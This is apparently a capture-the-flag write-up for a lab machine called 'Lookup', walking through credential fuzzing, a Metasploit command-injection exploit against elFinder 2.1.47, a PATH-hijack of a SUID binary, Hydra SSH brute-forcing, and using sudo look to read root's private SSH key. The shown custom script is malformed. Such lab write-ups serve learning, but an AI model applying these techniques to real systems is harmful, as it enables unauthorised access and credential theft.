Lookup

Test your enumeration skills on this boot-to-root machine.

There is a login page that is supposed to be bypassed.

  1. I ran a TCP scan via NMAP, but the results obtained were of no use.

  2. I also did subdomain and directory enumeration, but neither of them had anything useful.

  3. Ran individual username and password fuzzing scans via ffuf on the login page and found the following creds: Username: jose Password: password123

  4. Upon logging in, there was a redirection to files.lookup.thm which was a file manager system.

  5. elFinder 2.1.47 was running on the system.

  6. I looked for its exploit online on ExploitDB and even found one https://www.exploit-db.com/exploits/46481, but implementing it was causing some difficulty, hence I went with Metasploit, from where I used a command injection-based payload to get a meterpreter into the target as www-data.

  7. From there, I tried to look for a scope for privilege escalation. I couldn't run sudo, no binaries were exploitable, and I couldn't read the password hashes. It was all restricted.

  8. I looked for SUID bins with find / -perms -u=s -type=f 2>/dev/null and found a binary that stood out user/sbin/pwm.

  9. I ran it and found that it was executing some sort of id command as follows

  11. Cherry on top, it had root privileges. So I could do something with this file.

  12. I thought of doing escalation via path and added the tmp directory to the path as follows export PATH=$PATH:/tmp

  13. This way the id command would run our custom script stored in the tmp folder.

  14. I tried to get the passwords on the system via the following custom script.

#!/bin/bash
echo 'echo "uid=33(think) gid=33(think) groups=33(think)'

I also saw in the home directory that think was a user.

14. I obtained a huge list of passwords upon running the custom script.

15. I used Hydra later to brute-force credentials via SSH for think user and used the passwords I had obtained as a wordlist passlist.txt. The following command was used.

hydra -l think -p passlist.txt 10.10.30.29 ssh

16. The password was obtained, and I connected via SSH as think .

17. I ran sudo -l and found the following binary.

18. GTFO bins fortunately had a solution for /usr/bin/look

LFILE=file_to_read
sudo look '' "$LFILE"

  1. Now, I could read any file I wanted from the system. So to attain root privileges, I used the following command to get the SSH key for root.

sudo look '' /root/.ssh/id_rsa

20. I got the following output.

  1. Now, using the key for root, I could log in via SSH.

ssh root@10.10.30.29 -i id_rsa

Bingo, the privileges were escalated to root, and the root flag was obtained.

PreviousEasyNextCyborg

Last updated